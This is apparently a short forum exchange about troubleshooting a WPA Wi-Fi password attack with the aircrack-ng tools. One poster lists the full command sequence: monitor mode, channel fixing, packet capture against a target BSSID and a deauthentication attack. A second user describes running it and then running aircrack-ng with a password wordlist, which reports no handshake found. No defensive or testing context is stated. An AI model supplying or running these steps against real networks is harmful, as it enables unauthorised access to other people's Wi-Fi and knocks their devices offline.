What works for me with certain cards is this;
systemctl stop NetworkManager (If you use network manager)
ifconfig wlan0 down
airmon-ng start wlan0
iwconfig mon0 channel 4
airodump-ng -c 4 -w something --bssid MAC
aireplay-ng -0 4 -a MAC -c MAC
Basically you force it to a channel before using it.
Ok, so I've followed your instructions, substituting my desired channel, and it got me through the deauth step. However, when I go to actually crack the password with:
aircrack-ng -w passwordlist.txt -b MAC psk-01.cap
It simply tells me there are no valid WPA handshakes found. In the upper right hand corner after running airodump-ng it still says:
fixed channel mon0: 3 < that number keeps changing every second
Even though I had no problem deauthing, indicating I'm on the appropriate channel.